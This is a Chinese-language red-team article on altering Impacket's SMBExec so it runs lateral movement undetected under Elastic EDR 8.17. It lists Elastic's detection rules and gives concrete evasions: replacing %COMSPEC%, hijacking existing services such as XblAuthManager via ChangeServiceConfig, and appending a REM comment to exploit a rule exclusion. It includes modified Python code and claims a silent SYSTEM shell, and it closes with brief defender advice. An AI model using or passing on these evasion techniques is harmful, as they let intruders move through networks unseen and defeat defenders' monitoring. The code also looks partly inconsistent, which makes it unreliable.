Elastic EDR环境下SMBExec横向移动绕过技术研究<\/h1>

前言<\/h2>
本文详细分析在Elastic EDR环境下使用SMBExec进行横向移动时遇到的检测机制，以及如何通过二次开发绕过这些检测。Elastic EDR作为一款开源终端检测与响应解决方案，对SMBExec这类横向移动技术有着较为完善的检测能力。通过深入研究其检测规则并修改SMBExec实现特征，最终实现了在Elastic EDR 8.17版本下的零告警横向移动。<\/p>

SMBExec原理解析<\/h2>

执行流程分析<\/h3>

初始化阶段<\/strong>：<\/p>

用户输入参数传入CMDEXEC类初始化<\/li>
进入run函数设置Pipe命令管道、连接端口和目标主机<\/li>
默认使用svcctl<\/code>管道（Windows远程管理服务管道）<\/li>
初始化RemoteShell类并调用cmdloop<\/code>函数<\/li> <\/ul> <\/li>
RemoteShell初始化<\/strong>：<\/p> 调用rpc.get_dce_rpc<\/code>获取RPC配置<\/li> 通过self.__scmr.connect()<\/code>与服务控制管理器(SCM)建立SMB连接<\/li> 使用self.__scmr.bind<\/code>与目标系统SCM建立RPC绑定<\/li> 调用scmr.hROpenSCManagerW<\/code>打开目标系统SCM服务句柄<\/li> <\/ul> <\/li> 命令执行准备<\/strong>：<\/p> 调用rpc.get_smb_connection<\/code>建立SMB文件系统连接<\/li> 调用self.do_cd<\/code>获取当前路径（模拟命令提示符）<\/li> 在do_cd<\/code>中调用关键的execute_remote<\/code>函数<\/li> <\/ul> <\/li> <\/ol> 关键函数分析：execute_remote<\/h3> 命令构造<\/strong>：<\/p> 判断shell_type<\/code>（默认为cmd）<\/li> 生成8位随机字符的bat文件名（如%SYSTEMROOT%\xvRHjXzF.bat<\/code>）<\/li> 构造执行命令示例： %COMSPEC% \/Q \/c echo cd ^> \\%COMPUTERNAME%\C$\__output 2^>^&1 > %SYSTEMROOT%\xvRHjXzF.bat & %COMSPEC% \/Q \/c %SYSTEMROOT%\xvRHjXzF.bat & del %SYSTEMROOT%\xvRHjXzF.bat <\/code><\/pre> <\/li> <\/ul> <\/li> 服务操作<\/strong>：<\/p> 调用scmr.hRCreateServiceW<\/code>创建随机名称服务<\/li> 服务ImagePath写入构造的command<\/li> 调用scmr.hRStartServiceW<\/code>启动服务<\/li> 调用scmr.hRDeleteService()<\/code>删除服务<\/li> 调用scmr.hRCloseServiceHandle<\/code>关闭服务句柄<\/li> 通过self.get_output<\/code>获取命令执行结果<\/li> <\/ul> <\/li> <\/ol> Elastic EDR检测规则分析<\/h2> Potential Lateral Movement via SMBExec<\/strong>：<\/p> 检测通过SCM在目标系统上执行的SMBExec特征命令<\/li> <\/ul> <\/li> Suspicious Service ImagePath Value<\/strong>：<\/p> 检测服务ImagePath中包含可疑值（如%COMSPEC%<\/code>）<\/li> <\/ul> <\/li> Suspicious Service was Installed in the System<\/strong>：<\/p> 检测系统中安装的可疑服务<\/li> <\/ul> <\/li> System Shells via Services<\/strong>：<\/p> 检测通过服务获取系统Shell的行为<\/li> <\/ul> <\/li> 未命名规则<\/strong>：<\/p> 检测特定模式的命令执行（如cmd.exe \/Q<\/code>）<\/li> <\/ul> <\/li> <\/ol> 绕过技术实现<\/h2> 第一阶段绕过：基础特征修改<\/h3> BAT文件处理优化<\/strong>：<\/p> 原实现立即删除BAT文件触发告警<\/li> 修改方案：去除立即删除操作（会留下痕迹但减少告警）<\/li> 或在最后统一执行删除操作<\/li> <\/ul> <\/li> <\/ul> <\/li> ImagePath特征绕过<\/strong>：<\/p> 原实现使用%COMSPEC%<\/code>触发检测<\/li> 修改方案：直接使用cmd.exe<\/code>替代%COMSPEC%<\/code><\/li> 或使用PowerShell作为shell类型<\/li> <\/ul> <\/li> <\/ul> <\/li> <\/ol> 第二阶段绕过：服务创建检测<\/h3> 服务操作优化<\/strong>：<\/p> 原实现创建新服务触发多重告警<\/li> 修改方案（借鉴SCShell技术）：使用ChangeServiceConfigA<\/code>API修改现有服务ImagePath<\/li> 避免创建新服务从而绕过"Suspicious Service was Installed"告警<\/li> <\/ul> <\/li> <\/ul> <\/li> 服务选择策略<\/strong>：<\/p> 大多数Windows版本可使用XblAuthManager<\/code>服务<\/li> 低版本Windows可使用defragsvc<\/code>服务<\/li> <\/ul> <\/li> <\/ol> 第三阶段绕过：最终告警消除<\/h3> 命令特征排除<\/strong>：检测规则中存在排除项NVDisplay.ContainerLocalSystem<\/code><\/li> 修改方案：在构造命令末尾添加& REM NVDisplay.ContainerLocalSystem<\/code><\/li> 利用REM注释功能满足排除条件<\/li> <\/ul> <\/li> <\/ul> <\/li> <\/ol> 完整绕过实现代码<\/h2> # 修改后的execute_remote函数关键部分<\/span> <\/span><\/span>def<\/span> execute_remote<\/span>(self, data): <\/span><\/span> # 修改shell类型避免%COMSPEC%检测<\/span> <\/span><\/span> if<\/span> self.<\/span>__shell_type ==<\/span> 'powershell'<\/span>: <\/span><\/span> command =<\/span> self.<\/span>__build_powershell_command(data) <\/span><\/span> else<\/span>: <\/span><\/span> # 直接使用cmd.exe避免%COMSPEC%检测<\/span> <\/span><\/span> command =<\/span> 'cmd.exe \/Q \/c '<\/span> +<\/span> data <\/span><\/span> <\/span><\/span> # 使用现有服务而非创建新服务<\/span> <\/span><\/span> service_name =<\/span> "XblAuthManager"<\/span> # 或defragsvc<\/span> <\/span><\/span> scmr.<\/span>hROpenServiceW(self.<\/span>__scmr, self.<\/span>__scManager, service_name) <\/span><\/span> <\/span><\/span> # 修改服务ImagePath而非创建新服务<\/span> <\/span><\/span> scmr.<\/span>hRChangeServiceConfigW(self.<\/span>__scmr, self.<\/span>__service, <\/span><\/span> dwStartType=<\/span>scmr.<\/span>SERVICE_DEMAND_START, <\/span><\/span> lpBinaryPathName=<\/span>command) <\/span><\/span> <\/span><\/span> # 启动服务<\/span> <\/span><\/span> scmr.<\/span>hRStartServiceW(self.<\/span>__scmr, self.<\/span>__service) <\/span><\/span> <\/span><\/span> # 添加规则排除项<\/span> <\/span><\/span> command +=<\/span> " & REM NVDisplay.ContainerLocalSystem"<\/span> <\/span><\/span> <\/span><\/span> # 延迟删除BAT文件（如需）<\/span> <\/span><\/span> if<\/span> hasattr(self, '_batchFile'<\/span>): <\/span><\/span> self.<\/span>del_bat() <\/span><\/span> <\/span><\/span># 延迟删除BAT文件函数<\/span> <\/span><\/span>def<\/span> del_bat<\/span>(self): <\/span><\/span> command =<\/span> 'cmd.exe \/Q \/c del '<\/span> +<\/span> self.<\/span>_batchFile <\/span><\/span> # 同样使用服务修改方式执行删除<\/span> <\/span><\/span> scmr.<\/span>hRChangeServiceConfigW(self.<\/span>__scmr, self.<\/span>__service, <\/span><\/span> lpBinaryPathName=<\/span>command) <\/span><\/span> scmr.<\/span>hRStartServiceW(self.<\/span>__scmr, self.<\/span>__service) <\/span><\/span><\/code><\/pre>测试效果<\/h2> 经过上述修改后：<\/p> 所有5种类型告警均被成功绕过<\/li> 成功获取目标主机SYSTEM权限shell<\/li> Elastic EDR无任何告警产生<\/li> <\/ol> 总结与防御建议<\/h2> 攻击方总结<\/h3> 通过分析EDR检测规则可以找到针对性绕过方法<\/li> 修改现有服务比创建新服务更隐蔽<\/li> 合理利用规则排除项可以避免触发检测<\/li> 不同Windows版本需要选择不同的服务进行操作<\/li> <\/ol> 防御方建议<\/h3> 监控服务配置修改而不仅是服务创建<\/li> 对"安全"服务的异常修改行为进行检测<\/li> 更新排除项规则避免被滥用<\/li> 结合多维度行为分析而非单一特征检测<\/li> <\/ol> 本技术研究展示了在Elastic EDR环境下实现OPSEC安全的SMB横向移动方法，对于红队演练和渗透测试具有实战价值。对于商用EDR产品，需要根据其具体检测规则进行进一步测试和调整。<\/p>